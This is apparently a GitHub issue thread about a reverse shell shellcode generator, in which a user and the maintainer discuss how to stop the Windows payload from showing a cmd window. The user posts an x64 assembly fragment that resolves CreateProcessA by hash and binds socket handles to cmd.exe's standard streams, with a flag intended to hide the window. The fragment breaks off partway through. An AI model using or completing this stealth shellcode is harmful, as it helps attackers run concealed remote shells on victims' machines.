Cmd window open's up no matter what

[ShorterKing]

When the C payload is made no matter what you do in the program to hide the cmd window it will open regardless of whether you make it into a DLL or C++ Nothing works so I think the problem is in the payload itself.

[senzee1984]

Hi @ShorterKing , thanks for your feedback. I think the issue resides in the argument Creation Flag passed to CreateProcessA function. I will test it with the updated argument value and let you know.

[ShorterKing]

Yes, I thought the same so I tried this it hides the shell but the shell dies as soon as it connects. Hope this may help

"call_createprocess:"
" mov r9, rbp;" # R9 stores the base address of Kernel32.dll
" mov r8d, 0x16b3fe72;" # Hash of CreateProcessA
" call parse_module;" # Get the address of CreateProcessA
f"{shell_type}"
" push rdx;"
" mov rdx, rsp;" # Pointer to "cmd.exe" is stored in the RCX register
" push r12;" # The member STDERROR is the return value of WSASocketA
" push r12;" # The member STDOUTPUT is the return value of WSASocketA
" push r12;" # The member STDINPUT is the return value of WSASocketA
" xor rcx, rcx;"
" push cx;" # Pad with 0x00 before pushing the dwFlags member, only the total size matters
" push rcx;"
" push rcx;"
" mov cl, 0xff;"
" inc cx;" # 0xff+1=0x100
" push cx;" # dwFlags=0x100
" push "+str(CREATE_NO_WINDOW)+";"
" xor rcx, rcx;"